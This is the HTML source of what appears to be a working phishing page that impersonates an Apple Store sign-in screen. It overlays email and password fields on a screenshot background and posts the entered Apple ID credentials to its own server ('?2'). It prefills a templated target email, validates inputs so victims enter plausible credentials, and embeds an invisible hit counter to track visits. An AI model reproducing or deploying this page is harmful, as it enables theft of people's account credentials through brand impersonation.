<html>
<head>
	<title>Sign in - Apple Store</title>
	<link rel="icon" type="image/png" href="img/favicon.png" />
	<style>
		body {
		 margin-top: 15;
		 background: #f1f1f1;
		}

		.page {
		 background-image: url("img/main.png");
		 background-repeat: no-repeat;
		 height: 761px;
		 width: 986px;
		 position: relative;
		}

		input {
		 width: 332;
		 height: 32;
		 border: 0;
		 padding: 3 8 3 8;
		}

		.user {
		 position: absolute;
		 left: 99;
		 top: 282;
		}

		.pass {
		 position: absolute;
		 left: 99;
		 top: 333;
		}

		.button {
		 width: 105;
		 height: 37;
		 border: 0;
		 cursor: pointer;
		}

		.submit {
		 position: absolute;
		 left: 330;
		 top: 380;
		}

	</style>
	<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
	<script>
		function isemail(email) { 
			var re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
			return re.test(email);
		}
		function check() {
			if (!(isemail($('.user').val()))) {
				alert("Double-check that you typed a valid Apple ID.");
				return false;
			}
			if (document.getElementById('pass').value.length<4) {
				alert("Double-check that you have typed the right password.");
				return false;
			}
			return true;
		}
		var loaded = false;
		var time = 10000;
		$(function() {
			$(window).load(function() {
			   loaded = true;
			   if (isemail($('.user').val())) $('.pass').focus();
			});
			setTimeout(function() { 
				if(!loaded) {
					window.location.reload();
				}  
			},time);
		});
	</script>
</head>
<body style="visibility:hidden;" onload="$('body').css('visibility','')">
	<center>
		<form onsubmit="return check();" action="?2" method="post" id="login">
		<div class="page">
			<div><input id="user" name="user" class="user" value="{0}"></div>
			<div><input type="password" id="pass" name="pass" class="pass"></div>
			<input type="submit" style="height: 0px; width: 0px; border: none; padding: 0px;" hidefocus="true" />
			<div class="button submit" onclick="javascript:if(check()){document.getElementById('login').submit();}"></div>
		</div>
		</form>
<script type="text/javascript">
var sc_project=9710032; 
var sc_invisible=1; 
var sc_security="2bd741f4"; 
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure." : "http://www.");
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="free hit
counter" href="http://statcounter.com/free-hit-counter/"
target="_blank"><img class="statcounter"
src="http://c.statcounter.com/9710032/0/2bd741f4/1/"
alt="free hit counter"></a></div></noscript>
	</center>
</body>
</html>